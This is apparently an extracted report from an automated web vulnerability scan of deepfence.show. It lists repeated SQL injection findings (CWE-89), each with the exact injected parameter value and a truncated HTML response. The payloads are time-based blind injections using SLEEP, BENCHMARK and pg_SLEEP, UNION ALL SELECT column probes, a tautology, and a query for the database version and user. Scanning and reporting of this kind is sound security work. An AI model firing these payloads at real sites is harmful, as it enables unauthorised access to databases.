rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #439\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('\nA'))\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #440\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #441Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iosleep(5)#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #442\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.iopg_SLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #443\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')\n),4,5,6,7,8,9,10,11,12#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #444\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1Test Step GET\nModified \nParametersName Value\ndemouser@deepfence.io %2c(select%20*%20from%20(select(sleep(10)))a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #445\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io' OR '' = '\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #446\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #447\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29Response Content-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #448\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #449\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #450\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'\n)),4,5,6,7,8,9,10\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #451\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #452Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 'INJ'||'ECT'||'XXX',2--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget 